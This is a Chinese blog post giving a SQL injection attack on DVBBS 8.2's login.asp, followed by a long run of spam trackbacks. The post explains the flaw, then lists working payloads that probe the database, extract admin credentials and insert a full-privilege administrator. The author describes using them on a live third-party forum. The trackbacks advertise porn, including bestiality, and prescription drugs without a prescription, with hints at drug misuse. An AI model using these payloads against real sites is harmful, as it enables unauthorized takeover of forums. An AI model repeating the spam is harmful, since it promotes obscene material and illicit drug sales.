DVBBS8.2 LOGIN.ASP注入漏洞
Posted by adminOct 31
dvbbs8.2漏洞补下载地址:
http://bbs.dvbbs.net/dispbbs.asp?boardid=8&Id=1519564
紧急安全补丁0530
dvbbs8.2漏洞的产生
login.asp 这个文件的97行Function Dvbbs_ChkLogin 开始有以下代码:
username=trim(Dvbbs.CheckStr(request("username")))
而passport和username是用户输入的。
Public Function Checkstr(Str)
If Isnull(Str) Then
CheckStr = ""
Exit Function
End If
Str = Replace(Str,Chr(0),"")
CheckStr = Replace(Str,"'","''")
End Function
动网用Checkstr进行处理。
当我们输入111',request("username")是111%27
Dvbbs.CheckStr(request("passport"))以后还是111%27
If ajaxPro Then username = unescape(username)
username就变成了111'
所以,'符号并没有过滤掉,漏洞就产生了。
------------------------------------------------
打开论坛,进行检测,先注册帐号lixiaopeng
lixiaopeng' and '1'='1 密码随意输入
提示为:用户名或者密码不正确.
lixiaopeng' and '1'='2 密码随意输入
提示为:本论坛不存在该用户名.
如为上面的提示证明该论坛存在此漏洞
判断数据库类型:
lixiaopeng' and (select count(*) from sysobjects)>0 and '1'='1
登陆正确则证明为SQL库
lixiaopeng' and (select count(*) from msysobjects)>0 and '1'='1
登陆正确则证明为ACCESS库
lixiaopeng' and (select count(*) from dv_admin where left(username,1)='a')=1 and '1'='1
lixiaopeng' and (select count(*) from dv_admin where left(password,1)='a')=1 and '1'='1
lixiaopeng';update dv_user set password='bb6d61910d61c9e8' where username='lixiaopeng'--
lixiaopeng';update dv_user set usergroupid=1 where username='lixiaopeng'--
lixiaopeng';insert into dv_user (username,userpassword,usergroupid) values('lixiaopeng','bb6d61910d61c9e8','1')--
lixiaopeng';insert into dv_admin (username,password,flag,adduser) values('lixiaopeng','bb6d61910d61c9e8','1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45','lixiaopeng')--
为了省时间我就直接先找了个论坛测试,大家看操作就好,我们来到登陆页面,这句话的意思就是在这个论坛里加入一个管理拥护, 我拥护名为lixiaopeng 密码为lixiaopeng 密码是加密的, 我们来看看 下面的密码随便输入 ,这个意思就是代表成功了,我们来登陆看看,看见了吧, 呵呵,我们在来进后台不成功, 为什么呢, 应为刚刚我加入的是论坛管理, 没有提到后台管理,下面我们在来用代码,提到后台管理权限,我们来看代码意思就是把他的权限全部提升到45 ,我们来试试,好了,我们在登陆看,我们进来了,呵呵,。 好了就这样...........
114 comments
Trackback by Augmentin for pneumonoia. on April 17, 2010 at 10:47 am
Augmentin....
Augmentin and antiacids. Augmentin. Antibiotic augmentin side effects. Augmentin used for. Augmentin for pneumonia. Augmentin xr. Augmentin k clav. Augmentin side effects....
Trackback by Incest. on April 17, 2010 at 12:32 pm
Incest....
Incest....
Trackback by Ugly sluts granny sex. on April 17, 2010 at 11:26 pm
Free granny sex pic....
Granny sex. Granny sex pics. Free granny sex. Granny fat old age sex big boobs. Black granny sex....
Trackback by Cock and ball torture. on April 18, 2010 at 5:54 am
Free torture sex stories....
Cock ball torture gallery. Tit torture. Breast torture extreme. Pussy torture....
Trackback by Milf sex. on April 18, 2010 at 9:39 am
Milf sex....
Milf sex....
Trackback by Big black boobs. on April 19, 2010 at 1:33 pm
Big boobs alert....
Lanas big boobs. Big boobs. Free big boobs. Sexy big boobs....
Trackback by Link buy cialis cheap. on April 25, 2010 at 4:31 pm
Cialis....
Cialis levitra viagra. Purchase cialis. Cialis....
Trackback by Generic perocet. on April 25, 2010 at 11:19 pm
Perocet....
Perocet....
Trackback by Cheap flights to new york. on April 26, 2010 at 5:21 pm
Cheap flights to albany new york....
Cheap flights to new york....
Trackback by Alprazolam. on April 27, 2010 at 5:09 pm
Picture of alprazolam bars....
Alprazolam wikipedia the free encyclopedia. Alprazolam online. Your online pharmacy alprazolam anxiety. Alprazolam without prescription. Alprazolam online no prescription. Alprazolam. Alprazolam online without prescription....
Trackback by Animal sex stories free. on April 28, 2010 at 7:27 pm
Animal sex....
Free animal sex movies. Animal sex....
Trackback by Adipex. on April 29, 2010 at 12:33 am
Adipex....
Adipex diet pills. Buy adipex without prescription. Adipex. What is adipex....
Trackback by Where buy cheap adipex. on May 4, 2010 at 11:38 pm
Drug adipex....
Adipex online. How adipex works. Adipex....
Trackback by Cheap international flights. on May 5, 2010 at 5:06 am
Cheap flights....
Cheap flights....
Trackback by Teen lesbians have sex. on May 5, 2010 at 9:08 am
Amateur porn with amature sex and amateur teen....
Free sex teen galleries....
Trackback by Animal sex vids. on May 7, 2010 at 1:36 am
Animal human sex....
Free animal sex pictures. Animal sex videos. Sex with animal. Animal sex stories. Animal sex clips. Animal sex....
Trackback by Percocet. on May 8, 2010 at 12:13 am
Percocet side effects....
Long yellow percocet 10. Percocet. Percocet addiction. Does percocet cause itching. Order percocet....
Trackback by Animal sex free animal. on May 8, 2010 at 3:04 am
Free animal sex videos....
Animal sex movies. Animal sex thumbnails. Animal sex stories. Sex animal. Animal sex clips. Animal sex....
Trackback by Zolpidem fedex. on May 8, 2010 at 3:24 pm
Zolpidem....
Zolpidem tartrate. Cheap zolpidem. Zolpidem online. Zolpidem overdose. Zolpidem....
Trackback by Casino 1273771855 on May 14, 2010 at 9:11 pm
Casino 1273771855...
Casino 1273771855...
Trackback by Ambien lethal. on May 17, 2010 at 8:55 pm
Ambien online....
Ambien and pregnancy. Ambien ld-50. Ambien. Ambien cr color. Buy ambien cr. Ambien side effects. Buy ambien....
Trackback by Sex animal women. on May 19, 2010 at 3:10 am
Animal sex....
Animal sex with human. Animal sex stories. Human and animal sex....
Trackback by Free animal sex videos. on May 20, 2010 at 2:27 am
Bestiality sites animal sex movies videos....
Adult animal sex. Free animal sex vids. Free animal sex video's. Farm animal sex. Free animal sex movies. Free animal sex pics....
Trackback by Free animal sex tube. on May 21, 2010 at 1:13 am
Free animal sex tube....
Free animal sex tube....
Trackback by Phentermine no prescription. on May 27, 2010 at 5:53 pm
Low cost phentermine....
Phentermine blue. Phentermine. Get phentermine. Phentermine prozac. Buy phentermine mg....
Trackback by Vicodin. on July 1, 2010 at 2:08 pm
Vicodin....
Vicodin. Dangers of vicodin....
Trackback by Zoo sex. on July 1, 2010 at 6:50 pm
Zoo sex....
Zoo sex....
Trackback by Animal sex. on July 2, 2010 at 10:14 am
Animal sex....
Animal sex....
Trackback by Percocet addiction. on July 8, 2010 at 3:57 am
Percocet addiction....
512 percocet. Percocet 7.5 take recreationally. Percocet online. Percocet. Percocet addiction. Percocet withdrawal symptoms....
Trackback by Diflucan birth control pills. on July 8, 2010 at 9:51 am
Diflucan blood sugar....
Diflucan mechanism of action. Diflucan....
Trackback by Airfare. on July 8, 2010 at 9:18 pm
Low airfare for europe....
Airfare discounts. Airfare. Cheap airfare....
Trackback by Generic zoloft best online pharmacy. on July 9, 2010 at 9:39 am
Zoloft....
Zoloft. Side effects of zoloft drug. Effects of zoloft. Date zoloft became generic....
Trackback by Cialis. on July 9, 2010 at 7:49 pm
Buy cialis....
Multiple orgasms through cialis. Buy cialis. How cialis works. Cialis purchase. Cialis....
Trackback by Free blowjob video. on July 9, 2010 at 9:30 pm
What is a blowjob....
Free blowjob video. Nami blowjob game. Dog blowjob....
Trackback by Titel auteur datum xanax medication bmnwbbuk. on July 10, 2010 at 12:19 pm
Xanax....
Xanax....
Trackback by Generic adderall. on July 10, 2010 at 1:36 pm
Buy adderall without a prescription....
Adderall. Adderall xr. Combining adderall strattera. Where to buy adderall....
Trackback by Xanax. on July 10, 2010 at 6:31 pm
Xanax prescription....
Xanax dosage. Buy xanax. Half-life of xanax. No prescription xanax. Xanax side effects....
Trackback by Vicodin. on July 11, 2010 at 7:39 am
Vicodin....
Buy vicodin without script. Order vicodin es generic. Vicodin at overseas pharmacies. Vicodin. Vicodin drug information. Dangers of vicodin. Vicodin detox....
Trackback by Pictures of percocet. on July 11, 2010 at 12:01 pm
Percocet....
Percocet aspirin....
Trackback by Free handjob movies. on July 11, 2010 at 6:44 pm
Handjob....
Handjob stories. Handjob videos. Handjob cumshot. Free handjob videos. Hetero handjob. Handjob heaven. Handjob....
Trackback by Sex with animals. on July 12, 2010 at 5:20 am
Sex with animals....
Sex with animals....
Trackback by Percocet. on July 12, 2010 at 7:50 am
How do i get off percocet....
Percocet dosing. Percocet. Percocet dependency. Percocet withdrawal. Percocet extract how to shoot....
Trackback by Buy viagra online. on July 13, 2010 at 12:39 am
Cheap viagra....
Viagra. Order viagra. Story comparison viagra. Generic viagra. India viagra. Viagra sale....
Trackback by New drug levitra. on July 13, 2010 at 3:39 am
Buy levitra....
Buy levitra....
Trackback by Cialis. on July 13, 2010 at 12:07 pm
Buy cialis....
Cialis online. Cialis best price buy online. 3gp young size bbs -cialis -gay. Taking viagra with cialis. Cheapest generic cialis. Buy cialis mg x in us online pharmacy. Cialis....
Trackback by Vicodin without prescription. on July 13, 2010 at 10:16 pm
Vicodin side effects....
How long does vicodin withdrawal last. Vicodin user message board. Buy vicodin online without a prescription. Buy vicodin....
Trackback by Cheapest cialis. on July 14, 2010 at 12:49 am
Problems lubricating even with cialis....
Generic cialis pay by money order. Liquid cialis....
Trackback by Effects of vicodin. on July 15, 2010 at 2:45 am
Going off vicodin....
Buy vicodin without prescription. Vicodin. Pictures of vicodin. Vicodin addiction. Vicodin online....
Trackback by Buy vicodin without script. on July 15, 2010 at 2:03 pm
Vicodin....
Cheap vicodin cod. Vicodin. Dangers of vicodin. No prescription vicodin. Vicodin statistics....
Trackback by Percocet signs of abuse. on July 15, 2010 at 9:29 pm
Long term use of percocet....
Percocet 93-490. Percocet addiction. Long term use of percocet. Percocet. How to extract acitaminiaphine from percocet. Percocet dosage....
Trackback by Percocet. on July 15, 2010 at 10:14 pm
Dosages for percocet....
Percocet dependency. Side effects of percocet. Percocet. M360 percocet....
Trackback by Buy soma watson brand online 150 tablets. on July 16, 2010 at 11:45 am
Soma petroleum....
Soma triathlon....
Trackback by Gay tube. on July 16, 2010 at 7:37 pm
Gay tube....
Gay tube....
Trackback by Zoloft levitra pe cure. on July 16, 2010 at 9:33 pm
Levitra dosage....
Levitra....
Trackback by Viagra. on July 17, 2010 at 10:05 am
Buy viagra....
Free viagra. Viagra online stores. Online viagra. Viagra sale. Viagra....
Trackback by Percocet online. on July 17, 2010 at 6:12 pm
Long term use of percocet....
How long does percocet stay in your system. Percocet. Percocet vs. lortabs. Buy percocet and greece. Percocet sexual effects....
Trackback by Pecocet online. on July 18, 2010 at 12:08 am
Pecocet....
Pecocet online. Pecocet....
Trackback by Viagra. on July 18, 2010 at 2:22 am
Viagra attorneys....
Viagra. Generic viagra....
Trackback by Percocet. on July 18, 2010 at 9:52 am
Percocet....
Percocet alieve. Mixing tylenol 3 and percocet. Canadian prescriptions and percocet. Percocet....
Trackback by Percocet. on July 18, 2010 at 1:11 pm
Percocet withdrawal symptoms....
Percocet for anxiety. Symtoms of withdrawl from percocet. Percocet. Percocet vs lorcet for pain....
Trackback by Buy tramadol. on July 18, 2010 at 9:37 pm
Cheap tramadol....
Cheap tramadol without prescription. Tramadol....
Trackback by Adderall xr. on July 19, 2010 at 2:44 am
Adderall xr....
Adderall without a precscription. What is adderall. Adderall without a prescription. Adderall abuse. Adderall....
Trackback by Phentermine prescription. on July 19, 2010 at 9:59 am
Phentermine prescription....
Order phentermine online. Phentermine no prescription. Phentermine without a prescription. Phentermine. Card master no phentermine prescription....
Trackback by Discount viagra. on July 19, 2010 at 5:30 pm
Your viagra onlinne guide....
Viagra. Best price for generic viagra. Viagra generic. Re viagra cello. Discount viagra. Buy viagra uk....
Trackback by Cod phentermine as well as cialis cheap reviews. on July 20, 2010 at 1:22 am
Cialis....
Cialis generic. Cialis best price buy online. Cialis. Cialis st. Cialis free sample....
Trackback by Easing symptoms of vicodin withdrawal. on July 20, 2010 at 12:07 pm
Vicodin no rx....
Buy vicodin. Vicodin. Vicodin without prescription. Vicodin withdrawal. Vicodin without a prescription....
Trackback by Buy 180 xanax. on July 20, 2010 at 9:05 pm
Commit suicide on xanax....
Buy xanax. Xanax withdrawal symptoms. Xanax xr crushed. Xanax. No prescription xanax....
Trackback by Buy percocet online. on July 21, 2010 at 1:42 am
Percocet addiction....
Percocet. Percocet addiction....
Trackback by Percocet aspirin. on July 21, 2010 at 5:25 am
Percocet....
Percocet sexual effects. Percocet. How to extract oxycodone from percocet. Percocet vs. lortabs....
Trackback by Xenical hgh phentermine quit smoking detox. on July 21, 2010 at 10:53 am
Buy phentermine online....
Order phentermine online. Phentermine pill. Phentermine. Discount phentermine....
Trackback by Effects of taking vicodin. on July 21, 2010 at 1:09 pm
Vicodin....
Vicodin. Buy vicodin online. Symptoms vicodin addiction. Is it safe to snort vicodin. Vicodin no rx....
Trackback by Vicodin. on July 21, 2010 at 10:36 pm
Vicodin overdose....
Vicodin....
Trackback by Xanax. on July 22, 2010 at 12:49 am
Xanax....
Geniric xanax....
Trackback by How much weight can i lose with meridia. on July 22, 2010 at 2:11 am
Meridia....
Meridia. Cheap meridia. Meridia without prescriptions. Meridia drug online. How much is meridia in canada....
Trackback by Ambien side effects. on July 22, 2010 at 1:48 pm
Ambien....
Free trial version of ambien. Generic ambien. Ambien online. Ambien. Ambien prescriptions....
Trackback by Levitra for sale. on July 23, 2010 at 1:27 am
Levitra....
Cialis and levitra. Levitra erectile dysfunction treatment. Levitra viagra comparison. Levitra. Levitra cialis viagra....
Trackback by How to stop taking ambien. on July 23, 2010 at 8:59 pm
Ambien cr....
Ambien. Ambien on line. Ambien dangers. What is ambien. Ambien cr....
Trackback by Cialis. on July 24, 2010 at 1:13 am
Cialis....
Cialis best price buy online. Cialis....
Trackback by Buy xanax. on July 24, 2010 at 8:08 am
Xanax....
Buy xanax. Xanax usa. Cheap xanax. Xanax....
Trackback by Gay sex. on July 24, 2010 at 12:38 pm
Gay sex....
Gay sex....
Trackback by Free nude celebrities. on July 24, 2010 at 6:53 pm
Female celebrities naked....
Celebrities exposed. Nude celebrities. View celebrities nudity. Celebrities nude....
Trackback by Tramadol. on July 24, 2010 at 8:42 pm
Tramadol....
Tramadol....
Trackback by Buy cialis. on July 25, 2010 at 7:26 am
Cialis injury lawyer columbus....
Buy cialis online. Cialis. Cialis dosage 20mg. Cialis prescription. Buy cheap cialis....
Trackback by Cheap phentermine. on July 25, 2010 at 10:38 am
Phentermine without prescription....
Phentermine free shipping. Phentermine review. Phentermine. Diet tablets phentermine. Phentermine weight loss pill. Discount phentermine. Purchase phentermine....
Trackback by Free young porn. on July 25, 2010 at 8:03 pm
Free homemade porn movies....
Free porn sample movies. Free porn pics. Free bbw porn. Free porn movies. Free porn....
Trackback by Taking viagra with cialis. on July 26, 2010 at 7:36 am
Cialis best price buy online....
Buy generic cialis....
Trackback by Fucking. on July 26, 2010 at 10:11 am
Dog fucking....
Bizarre fucking. Butt fucking. Ass fucking. Anal fist fucking. Donkeys fucking women. Girls fucking guys. Horse fucking. Granny fucking....
Trackback by Carisoprodol. on July 27, 2010 at 2:50 am
Carisoprodol....
Buy carisoprodol online lowest price guarantee. Carisoprodol. Carisoprodol phentermine yellow. Carisoprodol addiction....
Trackback by Cialis. on July 27, 2010 at 10:45 am
Cialis....
Cialis....
Trackback by Buy vicodin without a prescription. on July 27, 2010 at 2:30 pm
Vicodin....
Vicodin....
Trackback by Phentermine free shipping. on July 27, 2010 at 7:00 pm
Phentermine online purchase....
Phentermine info. Phentermine. Phentermine tablet....
Trackback by Vicodin. on July 28, 2010 at 10:17 am
Vicodin....
Vicodin. How long does vicodin withdrawal last. Buy vicodin no prescription. Purchase vicodin. Vicodin online....
Trackback by Lorcet vicodin online. on July 28, 2010 at 11:58 pm
Vicodin m357....
Vicodin. Buy vicodin no prescription. Vicodin without prescription. Vicodin withdrawal....
Trackback by Lipitor. on July 29, 2010 at 4:23 pm
Generic version of lipitor....
Lipitor and grapefruit. Can i drink wine while i m on lipitor. Side effects from lipitor. Lipitor....
Trackback by What is tramadol. on August 3, 2010 at 6:17 pm
What is the street value for tramadol....
Lowest price tramadol. Buy tramadol. Tramadol for dogs. Tramadol. Hydrocodone vs tramadol....
Trackback by Britney without underwear. on August 4, 2010 at 3:15 am
Sexy underwear....
Britney spears underwear. Britney spears no underwear. Jockey underwear. Long underwear. Sexy underwear. Britney spears without underwear....
Trackback by Cialis. on August 4, 2010 at 8:57 am
Cialis....
Cialis no prescription. Soft cialis. Cialis. Cialis attorneys....
Trackback by Xenical. on August 4, 2010 at 8:43 pm
Xenical....
Xenical mexico prescriptions. Xenical. Hiv and xenical. Buy xenical....
Trackback by Zolpidem. on August 7, 2010 at 12:40 am
Zolpidem and sleepwalking....
Zolpidem fedex. Cheap zolpidem. Zolpidem overdose. Zolpidem....
Trackback by Britney spears without underwear. on August 7, 2010 at 11:02 am
Brittany spears no underwear....
Britney spears no underwear photos. Mens thong underwear. Britney spears no underwear....
Trackback by Long underwear. on August 9, 2010 at 9:07 pm
Britney spears no underwear....
Britney spears underwear. Britney spears no underwear. No underwear....
Trackback by Premarin. on August 10, 2010 at 6:07 pm
Premarin....
Premarin. Premarin and high blood pressure. Premarin no prescription on lin pharmacy. Premarin vaginal cream. Premarin 0 625mg. Premarin adoption....
Trackback by Vicodin withdrawal. on August 10, 2010 at 8:37 pm
Vicodin addiction....
Vicodin at overseas pharmacies. Purchase vicodin....
Trackback by Diflucan and nystatin. on August 11, 2010 at 12:34 am
Diflucan....
Diflucan course of action. Diflucan rebate. Diflucan. Diflucan dangerous side effects breathing....
Trackback by Britney spears no underwear. on August 11, 2010 at 9:02 pm
Brittany spears no underwear....
Brittany spears underwear. Mens underwear. Britney spears no underwear. Britney spears no underwear pictures. Brittany spears no underwear. Hairy men in underwear. Young girls in underwear....
Trackback by Acomplia. on August 11, 2010 at 11:01 pm
Acomplia....
Acomplia meds purchase. Acomplia. Acomplia mexico. Latest news about danger phentermine acomplia. Can i purchase acomplia in the us. About diet pill acomplia directory....
Trackback by Propecia specifications. on August 12, 2010 at 11:02 am
Get cheap propecia online....
Does propecia thin hair out at first....
Trackback by International trucks. on August 12, 2010 at 5:16 pm
Older trucks older....
Used ford trucks. Mack trucks. Older dodge trucks. Wrecked trucks. Street trucks. Nissan trucks. Chevy trucks for sale. Chevrolet trucks....
Trackback by Brittany spears no underwear. on August 26, 2010 at 8:10 am
Teenage boys in underwear....
Britney no underwear....
Trackback by Britney spears no underwear. on August 27, 2010 at 1:41 pm
Brittany spears underwear....
Underwear boys....
Trackback by Brittany spears underwear. on August 29, 2010 at 7:02 am
Thermal underwear....
Britney spears no underwear. Gay teen in underwear. Dicks in underwear. Teenage boys in underwear. Paris hilton no underwear. Spears no underwear. Britney underwear....
Trackback by Britney underwear. on August 30, 2010 at 5:42 am
Brittney spears no underwear....
Britney spears no underwear. Britney no underwear....
Trackback by Motorola fashion accessories for cellphones. on August 31, 2010 at 5:45 am
Accessories fashion....
Wholesale jewelry fashion findings accessories. Fashion accessories manuf. Lady com ultimate fashion and accessories. Fashion accessories in us....
Trackback by Designer shoes. on September 1, 2010 at 9:29 am
Womens designer shoes....
Ladies designer shoes. Designer handbag clothing shoes accessory. Designer golf shoes ladies green apple. Womens designer shoes. Designer shoes. Children designer shoes. Name brand designer shoes....
You must be logged in to post a comment.